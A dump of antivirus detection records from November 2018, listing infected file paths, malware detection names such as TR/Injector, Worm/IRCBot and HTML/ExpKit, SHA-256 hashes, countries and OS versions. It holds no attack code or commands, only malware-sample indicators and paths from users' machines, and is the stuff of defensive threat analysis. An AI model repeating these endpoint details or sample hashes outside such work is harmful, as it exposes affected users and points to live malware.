  Row(detection=Row(filename='avscan-20181102-060119-b039e623', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060119-B039E623', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051733-92f9886a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051733-92F9886A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051947-e30a473b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051947-E30A473B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:37:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:13:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051455-34bfca13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051455-34BFCA13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:32:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060658-7a28a732', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060658-7A28A732', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061541-b202bdcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061541-B202BDCF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054840-ebf4b52e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054840-EBF4B52E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053446-fa8c27cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053446-FA8C27CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053438-f5cb0c8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053438-F5CB0C8D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055854-59d3d970', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055854-59D3D970', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060604-59e4a6c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060604-59E4A6C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:24:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055904-5f8fbdcc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055904-5F8FBDCC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051108-ad293700', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051108-AD293700', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-183835-9ea28086', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e458018\\AVSCAN-20181101-183714-933F3F21\\AVSCAN-20181101-183835-9EA28086', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:38:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='edcffce6505f9278305fd672dfba3355320f88ca', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\edcffce6505f9278305fd672dfba3355320f88ca', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='18470b15c8daeab18764cceb5557120baf08283c75441e90f67022132c679b55', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath='K:\\HBCD\\Programs\\RAIDRECONSTRUCTOR.EXE', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110325-781f1a74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105548-25D20D21\\AVSCAN-20181101-110325-781F1A74', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tna 2017.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\TNA\\1. TNA 2017\\TNA 2017.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T16:55:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='karyawan teladan.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO KARYAWAN TELADAN\\KARYAWAN TELADAN.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:24:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='135464244321145.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\135464244321145.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='16092afeddb2d200125835637bebf7872659f749c0c14de8d6a2fd1c039ccf46', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\16092AFEDDB2D200125835637BEBF7872659F749C0C14DE8D6A2FD1C039CCF46', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='16092afeddb2d200125835637bebf7872659f749c0c14de8d6a2fd1c039ccf46', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:26:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-01T11:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:38:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155527-3ca6477b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155527-3CA6477B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ub 40.exe', filepath='\\\\?\\D:\\ub 40.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:42:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epm.exe', filepath='\\\\?\\E:\\02. Sharing Data\\Approved GRTT\\RAA\\Approved 2013\\Approved All eks\\epm.exe', filesize=26560000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='0d1edef1a6d85204125782adcaaedad471c5576efea6832875e74b4b364a9349', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:10:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155019-8851cb92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155019-8851CB92', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='199053535918533.exe', filepath='\\\\?\\C:\\Temp\\199053535918533.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160345-1028aba8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160345-1028ABA8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155858-dfc83165', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155858-DFC83165', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spic.exe', filepath='C:\\Program Files (x86)\\Goral\\spic.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Goral\\spic.exe', parentsize=384000, timestamp='2018-11-01T15:39:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111213-03ff18ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111213-03FF18FF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='object --> last notification before commencing legal action4471.zip --> 2016inv-apr04203.pdf.js', filepath='object --> Last notification before commencing legal action4471.zip --> 2016INV-APR04203.pdf.js', filesize=16000, name='HTML/ExpKit.Gen2.#M3.#R20197'), hash='83bf4ffce3533fa893349f928adde6b6cc3b3ab0d62323015ab1d9dfc119f3a5', metadata=Row(cmdline=None, country='RU', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:58:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123003-2b155547', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122940-17D29EEA\\AVSCAN-20181101-123003-2B155547', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172545-d38352d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172545-D38352D1', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='a212991f5b0316c1b818af5c6614a00237121a35bc45cca3e5d66469ec07cc7d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:25:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='synapse.exe', filepath='C:\\Users\\X\\Desktop\\Hax\\Bazynga - Synapse Dexin\\Synapse.exe', filesize=128000, name='HEUR/AGEN.1033386.#M1.#R1'), hash='680fa2eadd5464cccda41161a653055390ff65d1c43507fd554ee67ee66e9b0c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:25KnKkqcSEafTi\\\\\\/1.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:04:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121705-93527e5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121632-76F162FC\\AVSCAN-20181101-121705-93527E5D', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:17:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210056-870d1c39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205617-602DFCFE\\AVSCAN-20181101-210056-870D1C39', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:31:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110413-7109123e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e057c42\\AVSCAN-20181101-105919-4BFF9353\\AVSCAN-20181101-110413-7109123E', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:34:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b953a025af959baadaf9ee889c479fc1325d823f3669609cba450a0cfb290902', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\B953A025AF959BAADAF9EE889C479FC1325D823F3669609CBA450A0CFB290902', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b953a025af959baadaf9ee889c479fc1325d823f3669609cba450a0cfb290902', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:19:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cool_photo.exe', filepath='G:\\Cool_Photo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:49:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7867A1B7-AB4F-4FAF-8BE8-E64B0D8AA5B0}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a8def4e45e01b29ea7b409415d5336ec2a66eee3329b4c877bcf13534e3d457a', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110036-ac2876f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110036-AC2876F6', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162517-201df82b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_484b0544\\AVSCAN-20181101-162505-1DFECAA1\\AVSCAN-20181101-162517-201DF82B', filesize=1088000, name='TR/Strictor.ca41b9.#M1.#R1'), hash='ca41b9db04c6227da715eb34d3bb5e92205ebc187e009ce0e1db2c944efce400', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:25:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111103-fb3740a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111103-FB3740A4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:48Z'), dt=datetime.date(2018, 11, 1)),
